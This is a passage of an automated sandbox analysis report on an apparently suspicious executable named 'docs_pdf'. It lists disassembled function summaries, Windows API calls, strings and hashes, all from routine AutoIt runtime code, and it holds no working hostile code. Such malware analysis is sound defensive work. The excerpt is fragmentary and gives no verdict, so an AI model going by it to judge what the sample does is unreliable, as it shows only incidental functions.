                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                    • String ID: 255.255.255.255
                                    • API String ID: 2496851823-2422070025
                                    • Opcode ID: 668e8f7a88efe5ebd8a6cdeb3f2ed20ad5d686a0275424db52e3641e44a63f50
                                    • Instruction ID: ead4bc8336e9a96ce9cae5e96f3ed2f970502772f3e4429f043725d39c42fbab
                                    • Opcode Fuzzy Hash: 668e8f7a88efe5ebd8a6cdeb3f2ed20ad5d686a0275424db52e3641e44a63f50
                                    • Instruction Fuzzy Hash: 8B11E538600216ABDB20AF64CC85FEDB7A8FF14310F10C557EA51972D1DB76A810C755
                                    Function 010092E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 0100B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0100B0E7
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 01009355
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    • Opcode ID: 6977fac07e13b8f8d677c6cf539f135f80f3aa71764e81cdf34c46dbbc8d5c8b
                                    • Instruction ID: faae02844b8e4c995ac6950c4e8fb72679625f82423cac839b738a855cf78b91
                                    • Opcode Fuzzy Hash: 6977fac07e13b8f8d677c6cf539f135f80f3aa71764e81cdf34c46dbbc8d5c8b
                                    • Instruction Fuzzy Hash: 8201F171A01215ABDB05FBA5CC918FE77ADBF06320F004609F9B26B2D2DA3958089B50
                                    Function 010091DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 0100B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0100B0E7
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0100924D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    • Opcode ID: a39ef681c6fb379979f4d623baa647a8c2a958dc75fe0d9236f9c549278b5799
                                    • Instruction ID: 77ec6a28a0522f4bf09e4a3b222e917cab925642716cf2bd2b9fecbd9b4b4f68
                                    • Opcode Fuzzy Hash: a39ef681c6fb379979f4d623baa647a8c2a958dc75fe0d9236f9c549278b5799
                                    • Instruction Fuzzy Hash: CD014771A402046BDB05FBA1CC92EFE77AC9F05300F100119B986672C2EA285F0C96B1
                                    Function 01009264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 0100B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0100B0E7
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 010092D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 372448540-1403004172
                                    • Opcode ID: 5a85c1e801a414436643ed0b89c4605029c98eeee95495477db6da0676066a28
                                    • Instruction ID: 270ee1fea5883ee48239dec1695bb2f2e15e024d5fa79e45496db64e64b6648f
                                    • Opcode Fuzzy Hash: 5a85c1e801a414436643ed0b89c4605029c98eeee95495477db6da0676066a28
                                    • Instruction Fuzzy Hash: B1012671A412096BEB01FBA5CD92EFE77AC9F10700F140119B986772C2DA295F0C96B2
                                    Function 010151CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp
                                    • String ID: #32770
                                    • API String ID: 2292705959-463685578
                                    • Opcode ID: 6c463c378abd7705058b693835ef6182ad0273d738f015012299c49771090f8e
                                    • Instruction ID: 8b4bfba4eec6c0f8a58a0113bd3abfce0a440e06427bf4010e82f30671e297fb
                                    • Opcode Fuzzy Hash: 6c463c378abd7705058b693835ef6182ad0273d738f015012299c49771090f8e
                                    • Instruction Fuzzy Hash: 5BE06833E0022D2BE320AB9AAC09FA7FBECEB41771F00005BFD50E7040E5649A048BE1
                                    Function 010081BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 010081CA
                                      • Part of subcall function 00FD3598: _doexit.LIBCMT ref: 00FD35A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Message_doexit
                                    • String ID: AutoIt$Error allocating memory.
                                    • API String ID: 1993061046-4017498283
                                    • Opcode ID: 27f7e05b6556bebcc64171e19025440375c45c9f462fef6429c88c3c906ad99b
                                    • Instruction ID: 39f87c2309912e562f8095731082343ca0ffc50edd5a262f59d5998afbfdff53
                                    • Opcode Fuzzy Hash: 27f7e05b6556bebcc64171e19025440375c45c9f462fef6429c88c3c906ad99b
                                    • Instruction Fuzzy Hash: 4ED0123228531936E21532AA7D0AFC5798C4B09B55F044066BB48995C3CAEA558152A9
                                    Function 00FEB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FEB564: _memset.LIBCMT ref: 00FEB571
                                      • Part of subcall function 00FD0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FEB540,?,?,?,00FB100A), ref: 00FD0B89
                                    • IsDebuggerPresent.KERNEL32(?,?,?,00FB100A), ref: 00FEB544
                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FB100A), ref: 00FEB553
                                    Strings
                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FEB54E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                    • API String ID: 3158253471-631824599
                                    • Opcode ID: ce72e395e215b7312ec42f181b2ab23757266ff70b419c3471ef82d322e99e3f
                                    • Instruction ID: 3d804dcad676e9b7dd3238517b63a3a154db6748a06a63a7b996f1eed38aa840
                                    • Opcode Fuzzy Hash: ce72e395e215b7312ec42f181b2ab23757266ff70b419c3471ef82d322e99e3f
                                    • Instruction Fuzzy Hash: DDE06D74A00751CBD370DF2AD5047437BE4AF04754F08892DE8C6C6659EBB9D404DB61
                                    Function 01035BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01035BF5
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01035C08
                                      • Part of subcall function 010154E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0101555E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: 0c27c994d2dfe8154b85e1705c3734a7c9b13ad47bfdcffee08916b57c37312c
                                    • Instruction ID: fdb8af1a59005060da06484c8e0ce1456d7eb5d514fa8f59529a6c49a9c46590
                                    • Opcode Fuzzy Hash: 0c27c994d2dfe8154b85e1705c3734a7c9b13ad47bfdcffee08916b57c37312c
                                    • Instruction Fuzzy Hash: 63D0C932788312B7E774BA70AC1BFD76A18AB55B51F000829B795AE1D4D9F95800C750